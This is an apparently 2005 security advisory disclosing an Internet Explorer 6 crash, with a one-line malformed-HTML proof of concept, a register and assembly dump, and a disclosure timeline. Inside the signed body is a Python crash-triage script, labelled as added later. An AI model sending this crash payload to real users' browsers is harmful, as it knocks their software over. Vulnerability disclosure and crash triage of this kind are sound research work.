
[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #6     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Pointer Dereference)   |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6d8eba
===================

The following HTML code forces M$ IE 6 to crash:
> <acronym><dd><h5><applet></caption></applet><li></h1>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

        7d6d8e84 894c2414         mov     [esp+0x14],ecx
        7d6d8e88 8b8ea4000000     mov     ecx,[esi+0xa4]
        7d6d8e8e 24fe             and     al,0xfe
        7d6d8e90 57               push    edi
        7d6d8e91 89542410         mov     [esp+0x10],edx
        7d6d8e95 8954241c         mov     [esp+0x1c],edx
        7d6d8e99 88442420         mov     [esp+0x20],al
        7d6d8e9d e89912e5ff       call    mshtml+0x7a13b (7d52a13b)
        7d6d8ea2 8b4c2428         mov     ecx,[esp+0x28]
        7d6d8ea6 68b2a06e7d       push    0x7d6ea0b2
        7d6d8eab 8bf8             mov     edi,eax
        7d6d8ead e89bb7e5ff       call    mshtml+0x8464d (7d53464d)
        7d6d8eb2 50               push    eax
        7d6d8eb3 8bcf             mov     ecx,edi
        7d6d8eb5 e8dfebfdff       call    mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
                                          ds:0023:0000000c=????
        7d6d8ebe 6685d2           test    dx,dx
        7d6d8ec1 7c39             jl      mshtml+0x228efc (7d6d8efc)
        7d6d8ec3 833d50e3747d01   cmp     dword ptr [mshtml+0x29e350
                                          (7d74e350)],0x1
        7d6d8eca 0fbffa           movsx   edi,dx
        7d6d8ecd 7513             jnz     mshtml+0x228ee2 (7d6d8ee2)
        7d6d8ecf a14ce3747d       mov     eax,[mshtml+0x29e34c
                                          (7d74e34c)]
        7d6d8ed4 8b484c           mov     ecx,[eax+0x4c]
        7d6d8ed7 8b4134           mov     eax,[ecx+0x34]
        7d6d8eda 8d147f           lea     edx,[edi+edi*2]
        7d6d8edd 8b3c90           mov     edi,[eax+edx*4]
        7d6d8ee0 eb23             jmp     mshtml+0x228f05 (7d6d8f05)

The access violation is a read through a null pointer (eax is zero when the
faulting `mov dx,[eax+0xc]` executes, so the read hits address 0x0000000c)
and is not exploitable.
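The register dump and faulting instruction above are enough to check the
"null pointer dereference, not exploitable" classification mechanically. The
following Python script is an added crash-triage example, not part of the
original advisory or of any Microsoft tooling: it parses the WinDbg-style
register lines and the FAULT line quoted above (the dump text is copied from
the advisory; the parsing format and the 64 KiB "never mapped in user mode"
threshold are assumptions of this example), evaluates the effective address of
the faulting memory operand, and classifies the access. It handles the general
operand forms `[reg]`, `[reg+disp]` and `[base+index*scale+disp]`, not only
the one instruction in this advisory.

```python
import re

# Constructed input: the register dump and FAULT line quoted in the advisory,
# in the format WinDbg prints them. Only these lines are needed for triage.
CRASH_DUMP = """\
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00000246

FAULT ->7d6d8eba 668b500c         mov     dx,[eax+0xc]
                                          ds:0023:0000000c=????
"""

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|eip|esp|ebp)=([0-9a-fA-F]{8})")
FAULT_RE = re.compile(r"FAULT ->([0-9a-fA-F]{8})\s+[0-9a-fA-F]+\s+(\w+)\s+(.*)")
MEM_RE = re.compile(r"\[([^\]]+)\]")

# Heuristic (assumption of this example): Win32 user-mode processes never have
# the first 64 KiB mapped, so a fault below this address is a null-pointer
# dereference rather than a controlled or wild pointer.
NULL_PAGE_LIMIT = 0x10000


def parse_registers(dump):
    """Return {register: value} for the 32-bit general registers in the dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def parse_fault(dump):
    """Return (eip, mnemonic, operand string) from the 'FAULT ->' line."""
    m = FAULT_RE.search(dump)
    if not m:
        raise ValueError("no FAULT line in dump")
    return int(m.group(1), 16), m.group(2), m.group(3).strip()


def effective_address(operand, regs):
    """Evaluate an x86 memory operand such as [eax+edx*4+0xc] against regs.

    Returns None when the operand is not a memory reference or names a symbol
    (e.g. mshtml+0x29e350) that cannot be resolved from the register dump.
    """
    m = MEM_RE.search(operand)
    if not m:
        return None
    total = 0
    for term in (t.strip() for t in m.group(1).split("+")):
        if "*" in term:                      # scaled index register
            reg, scale = (s.strip() for s in term.split("*"))
            if reg not in regs:
                return None
            total += regs[reg] * int(scale, 0)
        elif term in regs:                   # base register
            total += regs[term]
        else:                                # displacement, e.g. 0xc
            try:
                total += int(term, 0)
            except ValueError:
                return None
    return total & 0xFFFFFFFF


def triage(dump):
    """Classify the faulting access described by a register/FAULT dump."""
    regs = parse_registers(dump)
    eip, mnemonic, operands = parse_fault(dump)
    dst, _, src = operands.partition(",")
    # A memory operand on the destination side means the fault is a write;
    # otherwise the faulting access is a read of the source operand.
    if "[" in dst:
        access, operand = "write", dst
    else:
        access, operand = "read", src
    addr = effective_address(operand, regs)
    if addr is None:
        kind = "unresolved operand"
    elif addr < NULL_PAGE_LIMIT:
        kind = "null pointer dereference"
    else:
        kind = "wild pointer"               # needs manual analysis
    return {"eip": eip, "mnemonic": mnemonic, "access": access,
            "address": addr, "classification": kind}


if __name__ == "__main__":
    result = triage(CRASH_DUMP)
    print("eip=%08x %s %s at %s -> %s" % (
        result["eip"], result["mnemonic"], result["access"],
        "n/a" if result["address"] is None else "%08x" % result["address"],
        result["classification"]))
```

For the dump above the script reports a read at 0x0000000c and classifies it
as a null pointer dereference, matching the advisory's assessment; a write, or
a read at an attacker-influenced address, is the case that would warrant a
closer look rather than the "Low" rating given here.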


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@xxxxxxxxxx>

- --

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address; therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-----END PGP SIGNATURE-----